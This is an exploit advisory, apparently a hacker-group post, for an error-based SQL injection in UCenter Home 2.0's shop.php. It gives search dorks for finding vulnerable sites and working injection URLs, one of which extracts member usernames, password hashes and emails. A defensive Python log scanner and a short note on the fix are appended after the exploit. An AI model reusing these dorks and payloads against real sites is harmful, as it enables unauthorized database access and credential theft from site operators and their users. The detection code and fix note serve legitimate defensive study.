" p; E& P( E g7 d+ s
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Needed materials : Hex conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

To inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit the DB name `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
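
Added example (not part of the original advisory, and not UCenter Home code): a log check that flags shop.php requests whose shopid is not a plain integer and that carry the building blocks of the error-based query shown above. The combined log format, the IP addresses and the sample lines are constructed assumptions; the sample payload is abbreviated with "...".

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines (documentation IPs; payload abbreviated with "...").
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat(...,floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 640',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /space.php?uid=4 HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Building blocks of the MySQL duplicate-key error technique in the advisory.
MARKERS = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(", r"information_schema", r"group\s+by", r"concat\s*\(")]


def classify(target):
    """Return None if not a shop.php?shopid= request, else 'ok',
    'non_numeric' or 'error_based_sqli'."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/shop.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("shopid")
    if values is None:
        return None
    if all(re.fullmatch(r"[0-9]+", v) for v in values):
        return "ok"
    decoded = unquote_plus(parts.query)  # %20 and '+' become spaces before matching
    hits = sum(1 for m in MARKERS if m.search(decoded))
    return "error_based_sqli" if hits >= 2 else "non_numeric"


def scan(lines):
    """Return (source_ip, verdict) for every shopid request that is not 'ok'."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        verdict = classify(m.group(1)) if m else None
        if verdict not in (None, "ok"):
            findings.append((line.split()[0], verdict))
    return findings


if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

Detection of this kind supplements the fix, which is to treat shopid as an integer (or bind it as a query parameter) before it reaches the SQL statement.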